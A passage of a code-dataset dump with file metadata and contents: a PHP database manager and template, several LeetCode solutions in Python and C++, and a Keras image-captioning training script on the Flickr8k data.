"text": "\n\n<?php\n\trequire_once(\"../_header.php\");\n?>\n\n\t<!-- Admin Page -->\n\t\n<?php\n\trequire_once(\"../_footer.php\");\n?>"
},
{
"alpha_fraction": 0.5634028911590576,
"alphanum_fraction": 0.5640449523925781,
"avg_line_length": 24.120967864990234,
"blob_id": "d30e2b946edf318ba54001367408870b72d10818",
"content_id": "4f93d978aee9bfc3aa243bb7ddf3e4fc7c112ef9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3115,
"license_type": "no_license",
"max_line_length": 184,
"num_lines": 124,
"path": "/web/tools/ScrapeurlsManager.class.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?\n\n\trequire_once(\"DatabaseTool.class.php\");\n\n\tclass ScrapeurlsManager\n\t{\n\t\tfunction add($url,$name,$organizationid,$enabled)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'INSERT INTO scrapeurls(url,name,organizationid,enabled) VALUES(?,?,?,?)';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"ssss\", $url,$name,$organizationid,$enabled);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('scrapeurlid' => $row['scrapeurlid'],'url' => $row['url'],'name' => $row['name'],'organizationid' => $row['organizationid'],'enabled' => $row['enabled']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction get($scrapeurlid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM scrapeurls WHERE scrapeurlid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $scrapeurlid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('scrapeurlid' => $row['scrapeurlid'],'url' => $row['url'],'name' => $row['name'],'organizationid' => $row['organizationid'],'enabled' => $row['enabled']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction getall()\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM scrapeurls';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$retArray = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$object = (object) array('scrapeurlid' => $row['scrapeurlid'],'url' => $row['url'],'name' => $row['name'],'organizationid' => $row['organizationid'],'enabled' => $row['enabled']);\n\t\t\t\t\t$retArray[] = $object;\n\t\t\t\t}\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retArray;\n\t\t}\n\n\t\tfunction del($scrapeurlid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'DELETE FROM scrapeurls WHERE scrapeurlid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $scrapeurlid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\tfunction update($url,$name,$organizationid,$enabled)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'UPDATE scrapeurls SET url = ?,name = ?,organizationid = ?,enabled = ? WHERE scrapeurlid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sssss\", $url,$name,$organizationid,$enabled, $scrapeurlid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\t///// Application Specific Functions\n\n\t}\n\n?>\n"
},
{
"alpha_fraction": 0.553398072719574,
"alphanum_fraction": 0.553398072719574,
"avg_line_length": 10.55555534362793,
"blob_id": "c0412ccd612d629f164d168c39e84d066013bb75",
"content_id": "e5e72cb454f2453809a568709c6869314111ebb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 103,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 9,
"path": "/web/_template.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?php\n\trequire_once(\"_header.php\");\n?>\n\n\t<!-- Put Code Here -->\n\n<?php\n\trequire_once(\"_footer.php\");\n?>"
}
] | 26 |
Clarksh/leetcode | https://github.com/Clarksh/leetcode | c2e3b11a7c44e484616ac5646c013e81c0a7b018 | 3e5c3044b0f6dde3400b41f3b7f7dbca986e5067 | d94da99ac189f93fff2ae28f1a0060cbe345070b | refs/heads/master | 2020-04-19T04:50:25.728162 | 2019-08-21T12:48:19 | 2019-08-21T12:48:19 | 167,972,300 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5728155374526978,
"alphanum_fraction": 0.5776699185371399,
"avg_line_length": 35.54545593261719,
"blob_id": "ab67daeaca821e8b43b7a40b262ebad8bcd7cb08",
"content_id": "910e5c441da1b3363a8a7ce7061ba151b534f5a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 900,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 22,
"path": "/148_Sort List.py",
"repo_name": "Clarksh/leetcode",
"src_encoding": "UTF-8",
"text": "class Solution:\r\n def sortList(self, head: ListNode) -> ListNode:\r\n if not (head and head.next): return head\r\n fast, slow = head.next, head #\r\n while fast and fast.next:\r\n fast, slow = fast.next.next, slow.next # 遍历时候 快指针走两步,慢指针走一步\r\n # 当快指针走到终点,慢指针就到中点,截断链表\r\n mid, slow.next = slow, None\r\n left = self.sortList(head)\r\n right = self.sortList(mid)\r\n\r\n return self.merge2Lists(left, right)\r\n\r\n def merge2Lists(self, left: ListNode, right: ListNode) -> ListNode:\r\n if not left: return right\r\n if not right: return left\r\n if left.val < right.val:\r\n left.next = self.merge2Lists(left.next, right)\r\n return left\r\n else:\r\n right.next = self.merge2Lists(left, right.next)\r\n return right"
},
{
"alpha_fraction": 0.44897958636283875,
"alphanum_fraction": 0.46448978781700134,
"avg_line_length": 37.58064651489258,
"blob_id": "70954b500663a59e408e38107bfffdb38f78e389",
"content_id": "7b19d98d41bc7e538d34e8d706a779ab8fbb51df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1471,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 31,
"path": "/215_Kth Largest Element in an Array.py",
"repo_name": "Clarksh/leetcode",
"src_encoding": "GB18030",
"text": "class Solution:\r\n def findKthLargest(self, nums: List[int], k: int) -> int:\r\n # 调整堆\r\n def adjust_heap(lists, i, size):#以i为根节点开始调整成以i为根节点的最大堆\r\n lchild = 2 * i + 1#堆是完全二叉树,可求左右子树\r\n rchild = 2 * i + 2\r\n max = i\r\n if i < size / 2:#完全二叉树的分支节点(就是有叶子节点的)小于等了size/2\r\n if lchild < size and lists[lchild] > lists[max]:\r\n max = lchild\r\n if rchild < size and lists[rchild] > lists[max]:\r\n max = rchild\r\n if max != i:#如果根节点不是最大就调换位置\r\n lists[max], lists[i] = lists[i], lists[max]\r\n adjust_heap(lists, max, size)#然后以max为根节点进行调整\r\n\r\n # 创建堆\r\n def build_heap(lists, size):#从下往上构建堆\r\n for i in range(0, int(size/2))[::-1]:\r\n adjust_heap(lists, i, size)\r\n \r\n size = len(nums)\r\n build_heap(nums,size)#先创建堆\r\n count = 0\r\n for i in range(0, size)[::-1]:#i从size-1到1\r\n nums[0], nums[i] = nums[i], nums[0]#交换堆顶和堆底\r\n count += 1 #获得一个最大值加1\r\n if count == k:\r\n #print(nums[i])\r\n return nums[i]\r\n adjust_heap(nums, 0, i)#把剩下的重新排"
},
{
"alpha_fraction": 0.5469292998313904,
"alphanum_fraction": 0.5550405383110046,
"avg_line_length": 31.269229888916016,
"blob_id": "00d6c5659e5b5929b16bfa1c0ac6fb331c055f4d",
"content_id": "22d9c937688f0d5b69dd5d3757fa6de6cb3f673f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 919,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 26,
"path": "/23_Merge k Sorted Lists.py",
"repo_name": "Clarksh/leetcode",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\r\n if not lists: return\r\n num = len(lists) # 遍历数组,看有多少有序链表\r\n if num == 1:\r\n return lists[0]\r\n mid = int(num / 2)\r\n left = self.mergeKLists(lists[:mid])\r\n right = self.mergeKLists(lists[mid:])\r\n return self.merge2Lists(left, right)\r\n\r\n def merge2Lists(self, left, right): # 将两个有序链表合成一个有序链表\r\n if not left: return right\r\n if not right: return left\r\n if left.val < right.val:\r\n left.next = self.merge2Lists(left.next, right)\r\n return left\r\n else:\r\n right.next = self.merge2Lists(left, right.next)\r\n return right"
},
{
"alpha_fraction": 0.450236976146698,
"alphanum_fraction": 0.4644549787044525,
"avg_line_length": 22.823530197143555,
"blob_id": "9878e42f10efcede6030aec0e85424a24ca9d7ad",
"content_id": "07871e21640ffdb486282604982931fd41f18ad8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 17,
"path": "/169_Majority Element.py",
"repo_name": "Clarksh/leetcode",
"src_encoding": "UTF-8",
"text": "def majorityElement(nums):\r\n nums_set = set(nums) # 去重\r\n nums_dict = {}\r\n maj = len(nums) / 2\r\n for i in nums_set: # 初始化计数器\r\n nums_dict.update({i: 0})\r\n # print(nums_dict)\r\n for j in nums:\r\n nums_dict[j] += 1\r\n # print(nums_dict)\r\n for j in nums_set:\r\n if nums_dict[j] > maj:\r\n # print(j)\r\n return j\r\n\r\n\r\nmajorityElement([1, 1, 2])\r\n"
},
{
"alpha_fraction": 0.4585798680782318,
"alphanum_fraction": 0.4674556255340576,
"avg_line_length": 32,
"blob_id": "2bd2fdf70e049b56144ed1e35adb8cc837e2aec8",
"content_id": "eb8318ce094a6c2ec3b1cf2baaf4be47bca9d7dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 366,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 10,
"path": "/78_Subsets.py",
"repo_name": "Clarksh/leetcode",
"src_encoding": "UTF-8",
"text": "class Solution:\r\n def subsets(self, nums: List[int]) -> List[List[int]]:\r\n result = [[]]\r\n # result[0] = []\r\n # if len(num) == 0:\r\n # return result\r\n for i in range(0,len(nums)):\r\n # 添加 新元素 和之前旧元素的集合\r\n result = result + [[nums[i]] + j for j in result]\r\n return result"
},
{
"alpha_fraction": 0.5090634226799011,
"alphanum_fraction": 0.5317220687866211,
"avg_line_length": 31.200000762939453,
"blob_id": "c6c056be76d8d76639578dfb3ec6f70540891810",
"content_id": "ad15fb4cd69efe410a4804ec4cce2029149ba6ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 708,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 20,
"path": "/104_Maximum Depth of Binary Tree.py",
"repo_name": "Clarksh/leetcode",
"src_encoding": "UTF-8",
"text": "# https://blog.csdn.net/Findingxu/article/details/99640572\r\n\r\n# Definition for a binary tree node.\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\nclass Solution:\r\n def maxDepth(self, root: TreeNode) -> int:\r\n queue = [(root,0)] #初始化,里面放元组\r\n while(queue):\r\n node,depth = queue.pop(0) # 返回的不是元组(root,0),而是两个元素\r\n if node:\r\n queue.append((node.left,depth+1))\r\n queue.append((node.right,depth+1))\r\n #queue.extend([(node.left,depth+1),(node.right,depth+1)])\r\n else:\r\n return depth"
},
{
"alpha_fraction": 0.451127827167511,
"alphanum_fraction": 0.45864662528038025,
"avg_line_length": 28.846153259277344,
"blob_id": "74b2bf714c3150827893b1564664da3bc293aeab",
"content_id": "7c7db6b13317c6f12cdad30089b5b32cda8f9da0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 415,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 13,
"path": "/136_Single Number.py",
"repo_name": "Clarksh/leetcode",
"src_encoding": "UTF-8",
"text": "class Solution:\r\n def singleNumber(self, nums: List[int]) -> int:\r\n nums_set = set(nums) #去重\r\n nums_dict = {}\r\n for i in nums_set:#初始化计数器\r\n nums_dict.update({i:0})\r\n # print(nums_dict)\r\n for j in nums:\r\n nums_dict[j] += 1\r\n # print(nums_dict)\r\n for j in nums_set:\r\n if nums_dict[j] == 1 :\r\n return j"
},
{
"alpha_fraction": 0.44186046719551086,
"alphanum_fraction": 0.4790697693824768,
"avg_line_length": 22,
"blob_id": "22898e863efc1c2bbd9d4ba6f4cfd1be6a6fc200",
"content_id": "3e6f6bad0ca9081430ce4a5deed07d5f3ee45565",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 450,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 18,
"path": "/213_Power ofTwo.py",
"repo_name": "Clarksh/leetcode",
"src_encoding": "UTF-8",
"text": "# https://blog.csdn.net/Findingxu/article/details/99633998\r\n\r\n#迭代法\r\nclass Solution:\r\n def isPowerOfTwo(self, n: int) -> bool:\r\n if n<= 0 :\r\n return False\r\n while n>1: \r\n if n%2 == 0:\r\n n //=2 # 除得整数\r\n else:\r\n return False\r\n return True\r\n\r\n#位运算\r\nclass Solution:\r\n def isPowerOfTwo(self, n: int) -> bool:\r\n return n>0 and n&(n-1) == 0"
},
{
"alpha_fraction": 0.5784860849380493,
"alphanum_fraction": 0.5896414518356323,
"avg_line_length": 32.86111068725586,
"blob_id": "b8fcd9dae5947ec3f0f633f00dc468398f60b19e",
"content_id": "e68ea78534029b464f181411b1bb98cfd96f81e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1703,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 36,
"path": "/124_Binary Tree Maximum Path Sum.cpp",
"repo_name": "Clarksh/leetcode",
"src_encoding": "UTF-8",
"text": "\r\n/**\r\n * Definition for a binary tree node.\r\n * struct TreeNode {\r\n * int val;\r\n * TreeNode *left;\r\n * TreeNode *right;\r\n * TreeNode(int x) : val(x), left(NULL), right(NULL) {}\r\n * };\r\n */\r\n //博客分析 https://blog.csdn.net/Findingxu/article/details/99649130\r\nclass Solution {\r\npublic:\r\n int maxPathSum(TreeNode* root) {\r\n int maxSum = INT_MIN;\r\n maxPSum(root,maxSum); //递归一定要把参数 maxSum带上\r\n return maxSum; \r\n }\r\n int maxPSum(TreeNode* root,int &sumMax){ //加上&\r\n if(root == NULL) //确保递归函数有终止条件\r\n return 0;\r\n //左边最大值,右边最大值\r\n int leftMax = maxPSum(root->left,sumMax); // 调用递归求得子问题\r\n int rightMax = maxPSum(root->right,sumMax);\r\n // 下面两种方式都要当前根节点参与进来 \r\n //方式一:如果路径跨越左右子树\r\n int passRoot = root->val + max(0,leftMax) + max(0,rightMax); //跟0比,如果小于0就不要带上\r\n //方式二:如果路径只在一边\r\n //使用该种方式进行递归,保证从底至当前节点拥有单条路径,不分叉,这样leftMax和rightMax才能获得各自单条不分叉路线,才可以拼接成方式一\r\n int noRoot = root->val + max(0,max(leftMax,rightMax)); \r\n //sumMax里面已经包含了当前root的历史最大值,只有当根节点参与进来的两种方式得到更大值,才会更新sumMax\r\n sumMax = max(sumMax,max(passRoot,noRoot)); \r\n \r\n //return sumMax; //出错,说明还没有很了解递归\r\n return noRoot; // 递归只能通过第二种方式\r\n }\r\n};"
},
{
"alpha_fraction": 0.4884868562221527,
"alphanum_fraction": 0.49013158679008484,
"avg_line_length": 25.636363983154297,
"blob_id": "745f0fd17d0be4b43938390dae009fdff01f5a80",
"content_id": "f12c4a74001a0b5d66df13ade79395cda6acf2f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 608,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 22,
"path": "/230_Kth Smallest Element in a BST.py",
"repo_name": "Clarksh/leetcode",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node.\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\nclass Solution:\r\n def kthSmallest(self, root: TreeNode, k: int) -> int:\r\n \"\"\"\r\n :type root: TreeNode\r\n :type k: int\r\n :rtype: int\r\n \"\"\"\r\n \r\n def inorderTraversal(node):\r\n if not node:\r\n return []\r\n return inorderTraversal(node.left) + [node.val] + inorderTraversal(node.right)\r\n \r\n l = inorderTraversal(root)\r\n return l[k - 1]\r\n"
},
{
"alpha_fraction": 0.29735034704208374,
"alphanum_fraction": 0.3081452548503876,
"avg_line_length": 29.90625,
"blob_id": "2cd50b6a4adbedc239c5e6c070a75182ca395eb2",
"content_id": "944810de6565dd4fd640b16c5ae952a0401a3d82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1116,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 32,
"path": "/20_Valid_Parentheses.py",
"repo_name": "Clarksh/leetcode",
"src_encoding": "UTF-8",
"text": "class Solution:\r\n def isValid(self,s: str)-> bool:#方法一\r\n stack = []\r\n p_dict = {'(':')','[':']','{':'}'}\r\n left = p_dict.keys()\r\n right = p_dict.values()\r\n #print(left,right)\r\n for i in s:\r\n #����������ѹ��ջ\r\n if i in left:\r\n #print('1111')\r\n stack.append(i)\r\n #������ҷ��ţ����ж��Ƿ�ջ��Ϊ��Ӧ�������\r\n if i in right:\r\n #print('2222')\r\n if stack:\r\n if p_dict[stack[-1]] == i:\r\n #print(i)\r\n stack.pop()\r\n else:\r\n return False\r\n else:\r\n return False\r\n \r\n return len(stack) == 0\r\n\r\n def isValid2(self,s: str) -> bool: #方法二\r\n while '()' in s or '[]' in s or '{}' in s:\r\n s = s.replace('()', '')\r\n s = s.replace('{}', '')\r\n s = s.replace('[]', '')\r\n return s == ''"
}
] | 11 |
Riya-tech/ARBIE_2020 | https://github.com/Riya-tech/ARBIE_2020 | e59499e573bc39ac7bd1837b37d44bbb15abecce | 1626fc5f3e28c76a4cde3716daf83b2a66f67e6b | f1b6ff496366391dd9794b540687def53aa5d6f0 | refs/heads/main | 2023-04-11T11:06:21.893001 | 2021-04-28T14:14:36 | 2021-04-28T14:14:36 | 351,678,241 | 0 | 0 | MIT | 2021-03-26T05:59:51 | 2021-03-26T06:02:04 | 2021-04-28T14:14:36 | Python | [
{
"alpha_fraction": 0.6186254024505615,
"alphanum_fraction": 0.6530545949935913,
"avg_line_length": 30.216161727905273,
"blob_id": "7862c68dd110fb7a2a69b174e81649417c32057c",
"content_id": "6b562cce08b87a35dd1a7fbe6b8d29c60704122e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15452,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 495,
"path": "/Software/arbie_image_captioning.py",
"repo_name": "Riya-tech/ARBIE_2020",
"src_encoding": "UTF-8",
"text": "import keras\nimport tensorflow as tf\nimport glob\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\n# %matplotlib inline\nimport pickle\nfrom tqdm import tqdm\nimport pandas as pd\nfrom keras.preprocessing import sequence\nfrom keras.models import Sequential\nfrom keras.layers import LSTM, Embedding, TimeDistributed, Dense, RepeatVector, Activation, Flatten\nfrom keras.layers import merge\nfrom keras.optimizers import Adam, RMSprop\nfrom keras.layers.wrappers import Bidirectional\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.preprocessing import image\nimport nltk\nimport os\n\ntoken = '../input/img-caption-data/Flickr8k_text/Flickr8k.token.txt'\ncaptions = open(token, 'r').read().strip().split('\\n')\n\n\nd = {}\nfor i, row in enumerate(captions):\n row = row.split('\\t')\n row[0] = row[0][:len(row[0])-2]\n if row[0] in d:\n d[row[0]].append(row[1])\n else:\n d[row[0]] = [row[1]]\n \nd['1000268201_693b08cb0e.jpg']\n\nimages = '../input/img-caption-data/Flickr8k_Dataset/Flicker8k_Dataset/'\nimg = glob.glob(images+'*.jpg')\nimg[:5]\n\ndef split_data(l):\n temp = []\n for i in img:\n if i[len(images):] in l:\n temp.append(i)\n return temp\n\ntrain_images_file = '../input/img-caption-data/Flickr8k_text/Flickr_8k.trainImages.txt'\ntrain_images = set(open(train_images_file, 'r').read().strip().split('\\n'))\ntrain_img = split_data(train_images)\nlen(train_img)\n\nval_images_file = '../input/img-caption-data/Flickr8k_text/Flickr_8k.devImages.txt'\nval_images = set(open(val_images_file, 'r').read().strip().split('\\n'))\nval_img = split_data(val_images)\nlen(val_img)\n\ntest_images_file = '../input/img-caption-data/Flickr8k_text/Flickr_8k.testImages.txt'\ntest_images = set(open(test_images_file, 'r').read().strip().split('\\n'))\ntest_img = split_data(test_images)\nlen(test_img)\n\nImage.open(train_img[0])\n\n\ndef preprocess_input(x):\n x /= 255.\n x -= 0.5\n x *= 2.\n return x\n\ndef preprocess(image_path):\n img = image.load_img(image_path, target_size=(299, 299))\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n\n x = preprocess_input(x)\n return x\n\nplt.imshow(np.squeeze(preprocess(train_img[0])))\n\nmodel = InceptionV3(weights='imagenet')\n\nfrom keras.models import Model\n\nnew_input = model.input\nhidden_layer = model.layers[-2].output\n\nmodel_new = Model(new_input, hidden_layer)\n\ntryi = model_new.predict(preprocess(train_img[0]))\ntryi.shape\n\ndef encode(image):\n image = preprocess(image)\n temp_enc = model_new.predict(image)\n temp_enc = np.reshape(temp_enc, temp_enc.shape[1])\n return temp_enc\n\nencoding_train = {}\nfor img in tqdm(train_img):\n encoding_train[img[len(images):]] = encode(img)\n\nwith open(\"encoded_images_inceptionV3.p\", \"wb\") as encoded_pickle:\n pickle.dump(encoding_train, encoded_pickle)\n\nencoding_train = pickle.load(open('encoded_images_inceptionV3.p', 'rb'))\nencoding_train['3556792157_d09d42bef7.jpg'].shape\n\nencoding_test = {}\nfor img in tqdm(test_img):\n encoding_test[img[len(images):]] = encode(img)\n\nwith open(\"encoded_images_test_inceptionV3.p\", \"wb\") as encoded_pickle:\n pickle.dump(encoding_test, encoded_pickle)\n\nencoding_test = pickle.load(open('encoded_images_test_inceptionV3.p', 'rb'))\nencoding_test[test_img[0][len(images):]].shape\n\ntrain_d = {}\nfor i in train_img:\n if i[len(images):] in d:\n train_d[i] = d[i[len(images):]]\n\nprint(\"Length of train_d: \",len(train_d))\n\nval_d = {}\nfor i in val_img:\n if i[len(images):] in d:\n val_d[i] = d[i[len(images):]]\n \nprint(\"Length of val_d: \",len(val_d))\n\ntest_d = {}\nfor i in test_img:\n if i[len(images):] in d:\n test_d[i] = d[i[len(images):]]\n \nprint(\"Length of test_d: \",len(test_d))\n\ntrain_d[images+'3556792157_d09d42bef7.jpg']\n\n\ncaps = []\nfor key, val in train_d.items():\n for i in val:\n caps.append('<start> ' + i + ' <end>')\n\nwords = [i.split() for i in caps]\nunique = []\nfor i in words:\n unique.extend(i)\n \nunique = list(set(unique))\n\nwith open(\"unique.p\", \"wb\") as pickle_d:\n pickle.dump(unique, pickle_d)\n\nunique = pickle.load(open('unique.p', 'rb'))\nlen(unique)\n\n\nword2idx = {val:index for index, val in enumerate(unique)}\nword2idx['<start>']\n\nidx2word = {index:val for index, val in enumerate(unique)}\nidx2word[5553]\n\n\nmax_len = 0\nfor c in caps:\n c = c.split()\n if len(c) > max_len:\n max_len = len(c)\nmax_len\n\nlen(unique), max_len\n\nvocab_size = len(unique)\nvocab_size\n\n\nf = open('flickr8k_training_dataset.txt', 'w')\nf.write(\"image_id\\tcaptions\\n\")\n\nfor key, val in train_d.items():\n for i in val:\n f.write(key[len(images):] + \"\\t\" + \"<start> \" + i +\" <end>\" + \"\\n\")\n\nf.close()\n\ndf = pd.read_csv('flickr8k_training_dataset.txt', delimiter='\\t')\nlen(df)\n\nc = [i for i in df['captions']]\nlen(c)\n\nimgs = [i for i in df['image_id']]\na = c[-1]\na, imgs[-1]\n\nfor i in a.split():\n print (i, \"=>\", word2idx[i])\n\nsamples_per_epoch = 0\nfor ca in caps:\n samples_per_epoch += len(ca.split())-1\n \nsamples_per_epoch\n\n\n\ndef data_generator(batch_size = 32):\n partial_caps = []\n next_words = []\n images = []\n \n df = pd.read_csv('flickr8k_training_dataset.txt', delimiter='\\t')\n df = df.sample(frac=1)\n iter = df.iterrows()\n c = []\n imgs = []\n for i in range(df.shape[0]):\n x = next(iter)\n c.append(x[1][1])\n imgs.append(x[1][0])\n\n\n count = 0\n while True:\n for j, text in enumerate(c):\n current_image = encoding_train[imgs[j]]\n for i in range(len(text.split())-1):\n count+=1\n \n partial = [word2idx[txt] for txt in text.split()[:i+1]]\n partial_caps.append(partial)\n \n n = np.zeros(vocab_size)\n n[word2idx[text.split()[i+1]]] = 1\n next_words.append(n)\n \n images.append(current_image)\n\n if count>=batch_size:\n next_words = np.asarray(next_words)\n images = np.asarray(images)\n partial_caps = sequence.pad_sequences(partial_caps, maxlen=max_len, padding='post')\n yield ([images, partial_caps], next_words)\n partial_caps = []\n next_words = []\n images = []\n count = 0\n\n\nembedding_size = 300\n\n\nimage_model = Sequential([\n Dense(embedding_size, input_shape=(2048,), activation='relu'),\n RepeatVector(max_len)\n ])\n\n\ncaption_model = Sequential([\n Embedding(vocab_size, embedding_size, input_length=max_len),\n LSTM(256, return_sequences=True),\n TimeDistributed(Dense(300))\n ])\n\ntype(image_model)\n\n# max_len = 40\nimage_in = keras.Input(shape=(2048,))\ncaption_in = keras.Input(shape=(max_len,))\n\n\n# image_in = Input(shape=(2048,))\n# caption_in = keras.Input(shape=(max_len, vocab_size))\ncaption_in = keras.Input(shape=(max_len,))\nmerged = keras.layers.concatenate([image_model(image_in), caption_model(caption_in)],axis=1)\nlatent = Bidirectional(LSTM(256, return_sequences=False))(merged)\nout = Dense(vocab_size, activation='softmax')(latent)\nfinal_model = Model([image_in, caption_in], out)\n\nfinal_model.compile(loss='categorical_crossentropy', optimizer=RMSprop(), metrics=['accuracy'])\n\nfinal_model.summary()\n\nsteps_per_epoch = samples_per_epoch/128\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=samples_per_epoch, epochs=1, verbose=1)\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=samples_per_epoch, epochs=1, verbose=2)\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=samples_per_epoch, epochs=1, verbose=2)\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=samples_per_epoch, epochs=1, verbose=2)\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=samples_per_epoch, epochs=1, verbose=2)\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=samples_per_epoch, epochs=1, verbose=2)\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=samples_per_epoch, epochs=1, verbose=2)\n\nfinal_model.optimizer.lr = 1e-4\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=samples_per_epoch, epochs=1, verbose=1)\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=samples_per_epoch, epochs=1, verbose=2)\n\nfinal_model.save_weights('time_inceptionV3_7_loss_3.2604.h5')\n\nfinal_model.load_weights('time_inceptionV3_7_loss_3.2604.h5')\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=samples_per_epoch, epochs=1, verbose=2)\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=samples_per_epoch, epochs=1, verbose=2)\n\nfinal_model.save_weights('time_inceptionV3_3.21_loss.h5')\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=samples_per_epoch, epochs=1, verbose=2)\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=samples_per_epoch, epochs=1, verbose=2)\n\nfinal_model.fit(data_generator(batch_size=128), 